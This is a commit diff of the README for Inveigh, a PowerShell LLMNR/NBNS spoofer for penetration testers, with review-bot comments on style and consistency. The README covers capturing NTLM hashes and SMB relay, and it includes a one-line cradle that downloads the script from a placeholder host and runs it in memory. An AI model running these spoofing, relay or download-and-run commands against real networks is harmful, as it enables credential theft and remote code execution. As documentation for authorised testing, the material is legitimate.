author | Kevin Robertson <robertsonk@gmail.com> | 2015-10-06 20:49:28 -0400 |
---|---|---|
committer | Kevin Robertson <robertsonk@gmail.com> | 2015-10-06 20:49:28 -0400 |
commit | a8cc3e29be056545b42ed449610c1329d28a3fac (patch) | |
tree | b25fb847001d47b755797602139a3141ea6c0228 /README.md | |
parent | 1455b5f483d6ffdcaaa3d7f04b25d7b38a4b8617 (diff) | |
download | Inveigh-a8cc3e29be056545b42ed449610c1329d28a3fac.tar.gz Inveigh-a8cc3e29be056545b42ed449610c1329d28a3fac.zip |
Updated to reflect new module format
Diffstat (limited to 'README.md')
-rw-r--r-- | README.md | 53 |
1 files changed, 45 insertions, 8 deletions
@@ -1,8 +1,8 @@ # Inveigh -Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. +Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing standard post exploitation, phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. # Requirements -Tested minimums are PowerShell 2.0 and .NET 3.5. +Tested minimums are PowerShell 2.0 and .NET 3.5 # Notes 1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture. 
@@ -17,19 +17,56 @@ Tested minimums are PowerShell 2.0 and .NET 3.5. 10. SMB relay support is experimental at this point, use caution if employing on a pen test. # Usage -Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass the PowerShell script execution policy. +Obtain an elevated administrator or SYSTEM shell. + +Use a method to load the module: + +To import with Import-Method: +Import-Module ./Inveigh.ps1 + +To import with dot source method: +. ./Inveigh.ps1 + +To load into memory using Invoke-Expression: +IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") To execute with default settings: -Inveigh.ps1 +Invoke-Inveigh + +To load and execute with one line: +Import-Module ./Inveigh.ps1;Invoke-Inveigh To execute with features enabled/disabled: -Inveigh.ps1 -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 -OutputDir 'valid folder path' +Invoke-Inveigh -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' To execute with SMB relay enabled: -Inveigh.ps1 -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" +Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" + +Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters + +# Cmdlets +Invoke-Inveigh - Start Inveigh with or without parameters +Get-Inveigh - Get queued console output +Get-InveighLog - Get log entries +Get-InveighNTLM - Get all captured challenge/response hashes +Get-InveighNTLMv1 - Get captured NTLMv1 challenge/response hashes +Get-InveighNTLMv2 - Get captured NTLMv2 challenge/response hashes +Get-InveighStats - Get captured challenge/response counts +Get-InveighHelp - 
List the cmdlets +Watch-Inveigh - Enable real time console output +Hide-Inveigh - Disable real time console output +Clear-Inveigh - Clear capture, log, smbrelay, and spoof lists +Stop-Inveigh - Stop Inveigh # Screenshots - +Invoke-Inveigh execution with real time console and file output enabled + + +Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2 + HTTP to SMB Relay - + + +Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive Powershell Session payloads + |
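Review bot: In the first hunk (@@ -1,8 +1,8 @@), the Requirements line loses its trailing period ("Tested minimums are PowerShell 2.0 and .NET 3.5"), which looks unintentional and leaves it inconsistent with the other sentences in the README; restore the period. In the same hunk, the added phrase "standard post exploitation" would read better hyphenated as "standard post-exploitation".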
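Review bot: In the second hunk (@@ -17,19 +17,56 @@), the heading "To import with Import-Method:" does not match the command under it, `Import-Module ./Inveigh.ps1`; it should read "To import with Import-Module:". The Usage text also drops the earlier sentence about the PowerShell script execution policy without a replacement, although the new import and dot-source steps still load a .ps1 file, so say what the reader should expect there. The feature example silently replaces `-Output 0,1,2` with `-ConsoleOutput Y/N -FileOutput Y/N` and no longer lists `-ForceWPADAuth Y/N`; a short line noting the renamed or removed parameters would help anyone updating an existing invocation. The Invoke-Expression example fetches the script over plain `http://` into an elevated shell, so the README should at least recommend a host and transport the tester controls and trusts. Finally, the screenshot caption says "NTLM2" where the cmdlet list uses "NTLMv2".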